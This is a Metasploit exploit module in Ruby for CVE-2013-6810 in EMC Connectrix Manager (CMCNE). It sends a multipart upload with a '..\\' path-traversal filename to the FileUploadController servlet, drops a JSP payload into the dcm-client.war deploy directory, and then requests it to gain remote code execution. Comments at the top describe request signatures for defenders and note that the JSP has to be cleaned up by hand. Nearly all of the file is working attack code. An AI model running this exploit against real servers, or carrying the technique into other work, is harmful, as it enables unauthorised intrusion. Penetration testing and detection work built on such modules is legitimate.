require 'msf/core'
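# Metasploit module for CVE-2013-6810 / ZDI-13-280: the FileUploadController
# servlet in EMC CMCNE's Inmservlets.war accepts a multipart filename that
# contains "..\" sequences, so an uploaded file can be written outside the
# intended upload root (here, into the dcm-client.war deploy directory).
#
# Defender notes, all derived from the requests this module sends:
# * Upload: POST to /inmservlets/FileUploadController with a `ROOTDIR: ftproot`
#   header and a multipart part whose filename contains `..\` traversal
#   sequences and ends in `.jsp`.
# * Trigger: a subsequent GET for a previously unseen `.jsp` under /dcm-client/.
# * The module description lists releases up to and including 11.2.1 as
#   affected; remediation is the vendor fix tracked under the references below.
# * The module never deletes the uploaded JSP. After an authorised test the
#   file remains in the deploy directory and has to be removed by hand.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and the default RPORT (80).
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'EMC CMCNE Inmservlets.war FileUploadController Remote Code Execution',
      'Description'    => %q{
        This module exploits a file upload vulnerability found in EMC
        Connectrix Manager Converged Network Edition <= 11.2.1. The file
        upload vulnerability is triggered when sending a specially crafted
        filename to the FileUploadController servlet found within the
        Inmservlets.war archive. This allows the attacker to upload a
        specially crafted file which leads to remote code execution in the
        context of the server user.
      },
      'Author'         => [ 'james fitts' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'ZDI', '13-280' ],
          [ 'CVE', '2013-6810' ]
        ],
      'Privileged'     => true,
      'Platform'       => 'win',
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          [ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 18 2013'))

    register_options([Opt::RPORT(80)], self.class)
  end

  # Uploads the JSP payload through the vulnerable servlet and, if the server
  # reports success, requests the JSP once so that it runs.
  #
  # Prints an error and returns without sending the second request when the
  # upload request gets no response, a non-200 status, or a body without the
  # success marker.
  #
  # @return [void]
  def exploit
    peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"

    # Relative path prepended to the upload filename; this is the traversal
    # that moves the write from the upload root into the deploy directory.
    deploy = "..\\..\\..\\deploy\\dcm-client.war\\"

    # The payload is sent as a single line: CRLF and bare LF are stripped.
    jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
    @jsp_name = "#{rand_text_alphanumeric(4 + rand(32 - 4))}.jsp"

    data = Rex::MIME::Message.new
    data.add_part(jsp, nil, nil,
      "form-data; name=\"ftproot\"; filename=\"#{deploy}#{@jsp_name}\"")

    # Drops the CRLF that precedes a "--_Part_" boundary at the start of a line.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")

    print_status("#{peer} - Uploading the JSP Payload...")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => normalize_uri("inmservlets", "FileUploadController"),
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data,
      'headers' => {
        'ROOTDIR' => "ftproot"
      }
    })

    # send_request_cgi yields nil when no response arrives (timeout or refused
    # connection); guard before touching res.code so that case is reported as
    # a failed upload instead of raising NoMethodError.
    # NOTE(review): the marker below contains no spaces, unlike ordinary
    # response text -- confirm it against what the servlet actually returns.
    unless res && res.code == 200 && res.body =~ /SUCCESSFULLYUPLOADEDFILES!/
      print_error("Does not look like the files were uploaded to #{peer}...")
      return
    end

    print_good("File uploaded successfully!")
    print_status("Executing '#{@jsp_name}' now...")

    # The response to the trigger request is not inspected.
    send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("dcm-client", "#{@jsp_name}")
    })
  end
end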